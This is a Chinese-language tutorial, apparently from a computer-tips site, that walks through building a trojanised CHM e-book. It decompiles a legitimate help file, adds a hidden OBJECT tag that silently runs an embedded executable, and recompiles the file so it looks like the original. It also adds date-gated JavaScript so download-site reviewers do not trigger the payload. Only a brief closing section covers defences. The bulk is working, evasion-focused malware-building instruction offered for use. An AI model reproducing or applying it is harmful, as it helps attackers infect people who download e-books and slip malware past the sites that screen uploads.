萬盛學電腦網 >> 病毒防治 >> 詳解電子書(CHM)木馬病毒
詳解電子書(CHM)木馬病毒
電子書木馬(以下所指的電子書均指CHM格式的電子書)?其實這種方式的木馬傳播方法很早就有出現,但好象是多以網頁木馬的形式存在的,也就是把所謂的一個網頁木馬加入電子書裡,這種效果和一般的網頁木馬的效果一樣受到漏洞范圍的限制,因此一直沒引起人們的太大關注,也許大家覺得這樣還不如直接的網頁木馬來得方便,其實不然,因為電子書相對與網頁而言有許多“優點”,當然這裡所謂的“優點”是指在傳播木馬方面而言的!
相關推薦:特絡伊木馬查殺專區、
在正式打造我們的電子書木馬前,我們先分析一下它的“優點”吧!
一:因為電子書一般是在本地電腦域打開的,因此它所獲得的權限也是本地電腦域的權限,所以比起網頁木馬的Internet域來,讓木馬獲得執行的機會要簡單的多,“不必使用漏洞”就可以執行,從而也就不會被殺毒軟件查殺,如果你的木馬程序夠好的話!也不必擔心別人打了漏洞補丁!(Windows 2003除外,原因下面會說到);
二:現在的網頁木馬由於影響力太大,一般的人上網都會小心三分提防的,且它依賴與漏洞,所以生存的空間正在逐漸縮小,與此相反的是電子書的火爆下載,使得電子書木馬的傳播能力以及范圍大大加強!
三:由於木馬程序嵌入電子書裡,一般的殺毒軟件無法對其中存在的木馬病毒等破壞性程序進行檢查和清除,至少我還沒發現有哪個軟件可以做到這點,而且如果對這類電子書進行檢查,殺毒所需時間也會過長!
四:還有最後一點就是,網頁木馬一般都要自己辛辛苦苦的去傳播,並且站點隨時可能被關閉,而咱的電子書卻可以讓許多大的下載站點為咱做點貢獻!獲得長久時間的傳播,當然前提是這本電子書夠精彩!
好啦!下面就讓我帶大家一步步打造個超級隱蔽的電子書木馬吧!
首先准備好工具如下:
1:Microsoft HTML Help Workshop V1.32
電子書制作工具,由微軟公司出的編程配套軟件,可以幫助您建立 HTML 格式的幫助文件!當然也可以用Quick CHM等其他CHM格式的電子書制作工具;
2:超級木馬一只(也就是一個你覺得最好的木馬程序一個而已,相信大家比我熟悉),本文演示用“Window 按鈕突破專家”這個小軟件”;
3:現在最火爆的電子書籍(大哥們,不要拿咱們菜鳥的電腦教材開刀呀!)若干,當然如果你有能力自己做我也不反對,本文演示用Windows 2000的幫助文檔WINNTHelp下的access.chm開刀!
准備好了嗎?開始制作吧!
第一步:
打開access.chm,在右側的空白處,點擊右鍵菜單,選擇屬性,出現對話框:
我們可以知道這個電子文檔的默認主頁是:accessibility_overview.htm,標題欄文字是:輔助選項
第二步:
制作一個可以讓木馬運行並且同時可以自動轉到原電子書的默認主頁的網頁icyfox.htm,代碼如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="Window 按鈕突破專家.exe">
</OBJECT>
</BODY>
</HTML>
說明:把其中的accessibility_overview.htm改為你用的電子書的默認主頁名,把“Window 按鈕突破專家.exe”改為你的木馬程序名!
另外,如果你的木馬程序體積比較大,請相應的把上面的轉向時間3改的值大一點!
在Windows 2003中默認在本地電腦域中好像並不允許OBJECT標簽運行本地程序(我自己沒裝Windows 2003),所以不適合在Win2003使用!當然我們可以在代碼中加入判斷是否是Windows 2003的語句,來隱藏自己的木馬!用navigator.appVersion屬性判斷!
第三步:
打開HTML Help Workshop,選擇File菜單下的Decompile...項,對access.chm進行反編譯。
編譯後的目錄“G:CHM木馬”中可以看到access.hhc(對應幫助文檔左側的“目錄”項)和access.hhk(對應幫助文檔左側的“索引”項);
第四步:
建立一個新的帶有木馬的電子書;
把“Window 按鈕突破專家.exe”,也就是你的木馬程序復制到反編譯後的目錄“G:CHM木馬”中,並在此目錄下建立一個icyfox.hhp的文件(用記事本即可!),內容如下(注意;號後面的注釋不要寫上):
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=access.chm ;把access.chm改為你要生成的電子書名
Default Window=Main
Language=0x804 中文(中國)
[WINDOWS]
Main="輔助選項","access.hhc","access.hhk","icyfox.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
把上面的"輔助選項"改為你第一步時得到的標題欄文字,"access.hhc"及"access.hhk"分別改為你第三步得到的文件名
[FILES]
icyfox.htm
Window 按鈕突破專家.exe ;把它改為你要嵌入電子書的木馬程序名
最後,用HTML Help Workshop打開icyfox.hhp,點擊左側最下面的編譯按鈕,稍等一會就可以在“G:CHM木馬”目錄中發現已經編譯好的帶有木馬的電子書access.chm,打開看看!
加入電子書中的程序是不是運行啦?!還和原來的電子書滿相似的吧!當然由於我直接用的上面的icyfox.hhp直接來編譯出來的,並沒有對電子書進行更細致的調整,所以和原來的相比有點差異,當然如果你願意,做出和原電子書一樣的界面也可以的!^:^
當然我直接寫出icyfox.hhp這個文件的內容,也決不是為了多賺稿費,一方面免去制作電子書的過程說明,更重要的是因為它對你做一個可以“傳染”其他電子書的木馬是有作用的,不過鑒於這樣做已經具有病毒的傳染特性,其危害性過大,所以請不要找我要方法和代碼,也請自己想出方法寫出程序的各位大哥,不要進行大規模的散發!
看到這裡你也許會質問我所說的“優點”中的第四條根本沒法實現,因為當“下載站點”的站長打開時同樣會運行木馬,所以他就不會在為你“免費服務”啦,咋辦?
最會,就讓我和大家一起解決這點小問題,如何逃過那些“下載站點”的木馬檢測,而讓他們不知不覺的幫助你傳播電子書木馬!
分析一下,那些“下載站點”一般不會把你提供的電子書進行反編譯吧?!所以只要在他們打開你的電子書查看時,不運行你的木馬程序,這樣他們就會放心的把它放到自己的站點上供其它人下載!我的方法是在icyfox.htm中加入用於判斷時間的javascript代碼,當大於某日期時,再動態寫入運行木馬的HTML代碼,從而逃過檢測,修改後的icyfox.htm如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='accessibility_overview.htm'">
</HEAD>
<BODY>
<SCRIPT LANGUAGE="javascript">
//以下是在2004年4月11日至2004年4月18日之內不運行木馬
var ris = 11; //起始日
var rie = 18; //結束日
var yue = 4; //月
var nian = 2004;//年
var riqi = new Date();
var d = riqi.getDate();
var m = riqi.getMonth()+1;
var y = riqi.getYear();
WIE=navigator.appVersion;
//if(WIE.indexOf("在此加入代表Win2003的字符串")==-1){執行下面的代碼}//用這句可以防止在Win2003中運行木馬
//我因為沒有Win2003所以不知道版本該如何寫,請裝Win2003的兄弟把他改好!
if(y!=nian||m!=yue||d<ris||d>rie)
{
document.write('<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject"');
document.write(' CODEBASE="Window 按鈕突破專家.exe">');
document.write('</OBJECT>');
}
</SCRIPT>
</BODY>
</HTML>
想想,你說這個電子書木馬的生存傳播效果如何?!
最後,我說一下對這種電子書木馬的預防措施:
1.老生常談,下載電子書在一些比較正規的大的站點進行,因為這裡的書籍一般都是他們自己做的;
2.積極自我防護,修改本地安全屬性,使其無法在本地電腦域環境中運行木馬程序,相應的注冊表鍵值為:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones�下的1004項的值由原來的0改為十六進制的3,
如果你想詳細修改本地電腦域的安全屬性,可以把此同分支下的Flags項的值由原來的十六進制21改為0,再打開IE浏覽器“Internet 選項...”中的的“安全”標簽,是不是多了一個“我的電腦”圖標,仔細改改它的安全級別吧
